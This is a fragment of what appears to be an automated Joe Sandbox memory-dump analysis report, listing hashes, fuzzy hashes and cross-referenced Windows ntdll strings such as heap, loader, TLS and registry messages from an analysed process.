                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 4c1d456898f8179550cca3b74a86d62c8072cbad07a3107803dd494a0e01cac3
                                                                          • Instruction ID: 0c9b53f15d69700fd69b76b87b80d3fb70f5adbd23eb732dbb6a0e936142036e
                                                                          • Opcode Fuzzy Hash: 4c1d456898f8179550cca3b74a86d62c8072cbad07a3107803dd494a0e01cac3
                                                                          • Instruction Fuzzy Hash: 71E11F74A063819BEB14CF28C581BBAFBF2BF48350F14895DE4968B246E774E941DB50
                                                                          Strings
                                                                          • RTL: Re-Waiting, xrefs: 35750128
                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 357500C7
                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 357500F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                          • API String ID: 0-2474120054
                                                                          • Opcode ID: f7612a3272d92246b75bb21e39d2c916365d5a2479bc7794f2b49dedf864c033
                                                                          • Instruction ID: 9d196562c801948cacf9a65b864b18062d294b7539b0df591305797c80cb260b
                                                                          • Opcode Fuzzy Hash: f7612a3272d92246b75bb21e39d2c916365d5a2479bc7794f2b49dedf864c033
                                                                          • Instruction Fuzzy Hash: D6E1ACB46087419FE711CF28C884B1AB7E2BF84364F100A5DF5A58F2E1DBB4E946CB52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                          • API String ID: 0-2391371766
                                                                          • Opcode ID: fb09b8a8c7562fa20c92f5fe95c9974d094ebc77a453c48371b169c8fd4acc87
                                                                          • Instruction ID: f3ae03fcad88127b93f75e8c9219e2ec9a1e237f0819c9e0d5c0e7f3f45995ff
                                                                          • Opcode Fuzzy Hash: fb09b8a8c7562fa20c92f5fe95c9974d094ebc77a453c48371b169c8fd4acc87
                                                                          • Instruction Fuzzy Hash: E4B18CB1A18345AFE312DF54C884F6BB7F9BB44758F400929FA519F290DB71E848CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                                                          • API String ID: 0-1146358195
                                                                          • Opcode ID: 645ef3a2f842fd4d05ff2527040d1e33d48132992fb551879bc84448f6460c51
                                                                          • Instruction ID: a56b3772b91b2275150dbbe77a143d86611d65aa742bd380f817184266e0bc35
                                                                          • Opcode Fuzzy Hash: 645ef3a2f842fd4d05ff2527040d1e33d48132992fb551879bc84448f6460c51
                                                                          • Instruction Fuzzy Hash: 71A16A71A083459FD711DF28C885B1BBBE9BF84798F41092DB998AB250DB71DD08CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                          • API String ID: 0-3870751728
                                                                          • Opcode ID: c0d12f36a64514bcbea9b675bf52da582c69502d58aa57f2bac0637ef18d832b
                                                                          • Instruction ID: 332ae7b4cf8a8f9714406d30054c7b36e00fdeb36e562de32f0e6763ff14e516
                                                                          • Opcode Fuzzy Hash: c0d12f36a64514bcbea9b675bf52da582c69502d58aa57f2bac0637ef18d832b
                                                                          • Instruction Fuzzy Hash: 0A9129B4E002059FEB18CFA9C884B9DB7F1FF88358F14816AE905AB391E7759841CF54
                                                                          Strings
                                                                          • TargetNtPath, xrefs: 357BB3AF
                                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 357BB3AA
                                                                          • GlobalizationUserSettings, xrefs: 357BB3B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                          • API String ID: 0-505981995
                                                                          • Opcode ID: c0ce463e15f9a1a3c9f9ef6fe98091a89831e5d49ae3c34cad855934a8e3c893
                                                                          • Instruction ID: 3bad8a029cfb710d93cd8517f53a02a316f794dc0558d8cd8a8a8b254ac9aa9c
                                                                          • Opcode Fuzzy Hash: c0ce463e15f9a1a3c9f9ef6fe98091a89831e5d49ae3c34cad855934a8e3c893
                                                                          • Instruction Fuzzy Hash: F0616C72D01228ABDB21DB55DC9CB9AB7B9FF14710F4101E5A909AB250DBB4DE84CF90
                                                                          Strings
                                                                          • HEAP: , xrefs: 3573E442
                                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3573E455
                                                                          • HEAP[%wZ]: , xrefs: 3573E435
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                          • API String ID: 0-1340214556
                                                                          • Opcode ID: d447d037b37797db1e9f8df33041f58163a442778b204631e4e8d02d663b32c8
                                                                          • Instruction ID: 5f43f41570286a39f24fc71cc98f6440ad0992b10eb8291c01e018d3bbf29438
                                                                          • Opcode Fuzzy Hash: d447d037b37797db1e9f8df33041f58163a442778b204631e4e8d02d663b32c8
                                                                          • Instruction Fuzzy Hash: 95514035705780AFE712CBA8C895F9AFBF9FF04354F0448A4E9418B692D774EA40CB91
                                                                          Strings
                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3574A396
                                                                          • LdrpCompleteMapModule, xrefs: 3574A39D
                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3574A3A7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                          • API String ID: 0-1676968949
                                                                          Strings
                                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3578D7B2
                                                                          • HEAP: , xrefs: 3578D79F
                                                                          • HEAP[%wZ]: , xrefs: 3578D792
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                          • API String ID: 0-3815128232
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                          • API String ID: 0-1151232445
                                                                          Strings
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35751954
                                                                          • LdrpAllocateTls, xrefs: 3575194A
                                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35751943
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-4274184382
                                                                          Strings
                                                                          • @, xrefs: 3579BD71
                                                                          • PreferredUILanguages, xrefs: 3579BD92
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 3579BD45
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          • API String ID: 0-2968386058
                                                                          Strings
                                                                          • @, xrefs: 3576B2F0
                                                                          • GlobalFlag, xrefs: 3576B30F
                                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3576B2B2
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                          • API String ID: 0-4192008846
                                                                          Strings
                                                                          • DLL "%wZ" has TLS information at %p, xrefs: 3575184A
                                                                          • LdrpInitializeTls, xrefs: 35751851
                                                                          • minkernel\ntdll\ldrtls.c, xrefs: 3575185B
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                          • API String ID: 0-931879808
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35761D84
                                                                          • LdrpInitializationFailure, xrefs: 35761D7A
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 35761D73
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 0-2986994758
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@
                                                                          • API String ID: 0-149943524
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$AddD
                                                                          • API String ID: 0-2525844869
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          Strings
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 357BB5C4
                                                                          • RedirectedKey, xrefs: 357BB60E
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                          • API String ID: 0-1388552009
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @[}5$@[}5@[}5
                                                                          • API String ID: 0-2056036529
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$
                                                                          • API String ID: 3446177414-233714265
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                          • API String ID: 0-118005554
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .Local\$@
                                                                          • API String ID: 0-380025441
                                                                          Strings
                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3575289A
                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3575289F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                          • API String ID: 0-2653619699
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @[}5@[}5
                                                                          • API String ID: 0-2228212692
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @
                                                                          • API String ID: 0-2766056989
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: verifier.dll
                                                                          • API String ID: 0-3265496382
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          Strings
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 356DFFF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                                          • API String ID: 0-996340685
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Flst
                                                                          • API String ID: 0-2374792617
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a27d6d3b0da8321104f8f2f65d076c85944811b53293f25596168df6c605cca5
                                                                          • Instruction ID: a829021fe8615fc27575cf69cc33f899830268ca4c1382cec70f4eb5a9f43c47
                                                                          • Opcode Fuzzy Hash: a27d6d3b0da8321104f8f2f65d076c85944811b53293f25596168df6c605cca5
                                                                          • Instruction Fuzzy Hash: 4D718CB5A00628AFDB11CFADDC91AAEB7B6FF49750F104015E809AF251D731EC46CBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b3e00e6c3df3a2e271dbed3e75d5b6518457750f138a993269565e29ccf3a421
                                                                          • Instruction ID: ab1302b5916f68f849648c2cc468958f2a4e6f6986ddd2d1458b4ced7a4baf5c
                                                                          • Opcode Fuzzy Hash: b3e00e6c3df3a2e271dbed3e75d5b6518457750f138a993269565e29ccf3a421
                                                                          • Instruction Fuzzy Hash: 98515774A1A381CFD314CF29C180A1BBBE6FF88750F50496EE5999B754DB70E844CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 981287502b7475b711b0c1ed4ea026f3145cda7c30ed48c94bb406089197485b
                                                                          • Instruction ID: b28f9732b32a5d9af4dda238d3cc2a146ce36dc8fdac48945f82f3db254c9c00
                                                                          • Opcode Fuzzy Hash: 981287502b7475b711b0c1ed4ea026f3145cda7c30ed48c94bb406089197485b
                                                                          • Instruction Fuzzy Hash: C651DEB16143559FE720DF65CC88F9A77F9EB843B4F100A2DE916AB291DB30D801CBA1
                                                                          Memory Dump Source
